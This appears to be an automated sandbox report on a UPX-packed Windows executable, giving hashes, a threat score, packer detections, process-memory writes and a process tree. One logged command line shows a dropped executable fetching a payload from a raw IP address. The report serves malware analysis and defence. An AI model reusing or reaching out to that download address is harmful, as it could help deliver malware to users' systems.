faaa6b5d67e96f60bdcabf9cbd354c7a571667b033e0691274ff61ab6fba050e

Analysis

max time kernel
149s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
06/01/2024, 12:41

Target

46404cf3c08da849496794faf2686e84.exe
Size

80KB
MD5

46404cf3c08da849496794faf2686e84
SHA1

826e6b19bd7f225e642df101a81511bbdf146a6f
SHA256

faaa6b5d67e96f60bdcabf9cbd354c7a571667b033e0691274ff61ab6fba050e
SHA512

be3902749aeefd6ba318aba14c249df590c28d98470934bd9d72f3461a558e1c0e50f6e47471f4a1b9454f93d971a448faec8a9519798becb812160ed31fe6e9
SSDEEP

1536:i/ynx+g4CoJkXDSBZ19/k2bL0iS8CYMAGxbAPl8MvrByI+e:i/fjJcyZ158iGAycrT

Score

7^/10

upx

Executes dropped EXE 1 IoCs

pid	Process
4624	1142433877993

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

resource	yara_rule
behavioral2/memory/4180-0-0x0000000000400000-0x000000000042C000-memory.dmp	upx
behavioral2/memory/4180-13-0x0000000000400000-0x000000000042C000-memory.dmp	upx
behavioral2/memory/4180-19-0x0000000000400000-0x000000000042C000-memory.dmp	upx

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 4180 wrote to memory of 4624	4180	46404cf3c08da849496794faf2686e84.exe	16
PID 4180 wrote to memory of 4624	4180	46404cf3c08da849496794faf2686e84.exe	16
PID 4180 wrote to memory of 4624	4180	46404cf3c08da849496794faf2686e84.exe	16

C:\Users\Admin\AppData\Local\Temp\46404cf3c08da849496794faf2686e84.exe
"C:\Users\Admin\AppData\Local\Temp\46404cf3c08da849496794faf2686e84.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4180
- C:\Users\Admin\AppData\Local\Temp\1142433877993
  C:\Users\Admin\AppData\Local\Temp\1142433877993 "http://85.255.121.125/inwithmess.bin"
  2⤵
  - Executes dropped EXE
  PID:4624

memory/4180-0-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/4180-13-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/4180-19-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/4624-12-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/4624-14-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/4624-17-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download